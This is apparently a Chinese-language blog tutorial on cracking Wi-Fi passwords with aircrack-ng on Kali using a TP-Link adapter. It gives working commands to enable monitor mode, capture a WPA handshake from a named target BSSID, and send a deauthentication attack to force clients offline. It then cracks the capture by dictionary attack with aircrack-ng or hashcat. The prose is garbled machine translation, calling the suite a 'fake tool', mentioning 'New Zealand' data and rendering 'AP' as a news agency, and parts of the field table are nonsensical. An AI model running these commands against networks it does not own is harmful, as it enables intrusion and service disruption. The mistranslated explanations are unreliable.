為了能在arm的kali版本跑Monitor Mode in TP-Link-TL-WN722N-adapter 弄了好久終於弄出來拉!
簡介
aircrack 是一個比較出名的用於破解 WEP 和 WPA 智能的無線網絡的假工具,由 6 個不同的部分組成:
- aircrack-ng 用於破解 WEP 以及 WPA-PSK 密碼。aircrack-ng 工具收集了新西蘭的信息,aircrack-ng 將分析這些數據,並確定使用中的密碼。
- airdecap-ng 解讀被破解的網絡數據包
- airmon-ng 為使用整個 aircrack-ng 套件配置一個網卡
- aireplay-ng 在無線網絡中產生可能在恢復中的 WEP 損失價值的流量
- airodump-ng 被 aircrack-ng 用於破解 WEP 密碼的 802.11 幀
- 工具為微調提供分類工具箱
文章
配置無線網卡
- WM Ware(啟動後)虛擬機->可移動設備->Ralink 802.11 n Wlan(顯卡型號)->連接(斷開與主機的連接)
- 視箱虛擬機狀態下->將設備插入主機->設置->USB設備->添加->刪除除供應商標識(VendorID)和產品標識(ProductID)之外的參數->啟動->插入設備
- 驗證是否連接成功lsusb 空氣蒙 如果配置 配置文件出現無線網卡型號即為成功
無線基礎命令
iwlist #用於對/proc/net/wireless文件進行分析,得出無線網卡相關信息 iwlist wlan0掃描| grep " ESSID " #查看當前所有的AP名稱 配置文件 iwconfig wlan0 scan #掃描無線接入點 iwconfig wlan0暱稱黑客 #添加名稱
例子
以無線網卡名義 wlan0 舉例
airmon-ng start wlan0 #啟動網卡監聽模式 airmon-ng check kill #關閉干擾程序 airodump-ng wlan0mon #開啟抓包,獲取附件無線網絡
列名 | 意味 |
---|---|
BSSID(Basic Service SetIdentifier) | AP的MAC地址 |
PWR(Power) | 信號強度 |
Beacons | 美聯社發出的引用引用數,幾處採集點(1M) |
Data | 當前數據傳輸量 |
/s | 過去 00 秒內精彩數據1 數量 |
CH(Channel) | AP所屬的頻道 |
MB | AP的最大傳輸速度;MB=11 => 802.11b,MB=22 => 802.11b+,MB>22 => 802.11g;帶。的表示短封包標頭、速度快、更破解破解 |
ENC(Encryption) | 使用智能算法體系 |
CIPHER | 檢測到的智能算法 |
AUTH(Authority) | 認證方式 |
ESSID(The Extended Service Set Identifier) | AP的名稱 |
airodump-ng -c 6 --bssid E0:24:81:AF:F3:A8 -w wireless wlan0mon #指定特定的wifi抓抓包,出現握手則抓包成功 # -c 指定信道,上面已經標記了目標焦點的信道(CH) # -bssid 指定目標路由器的BSSID,就是廣告標記的BSSID # -w 指定抓取的數據包保存的目錄 aircrack-ng -a2 -b E0:24:81:AF:F3:A8 -w pass.txt wireless-01.cap #跑包
使用hashcat爆破(自己跑WPA/WPA2/PSK智能的)
用 aircrack-ng 把 cap 轉換成 hccap 類型數據包(會自動添加後綴名 .hccap)
aircrack-ng wireless-01.cap -J wireless
hashcat -m 2500 wireless.hccap pass.txt --force #用hashcat破解WPA/PSK密碼
複製提示“Old hccap format detected! You need to update”可以先一步的命令改為
aircrack-ng wireless-01.cap -j wireless
解除認證
注意如果抓不到抓包把對方抓下線,這樣就會抓包成功
aireplay-ng -0 10 -a <無線路由器的MAC地址> -c <連接上的設備MAC地址> wlan0mon # -0 衝突攻擊模式,在一起發送次數,一般使用模式分類。 # -a 無線網mac 地址 # -c 連接上的客戶端 mac 地址,就是那個 STATION 資料來源:https://github.com/ffffffff0x/1earn/blob/master/1earn/Security/%E5%AE%89%E5%85%A8%E5%B7%A5%E5%85%B7/aircrack.md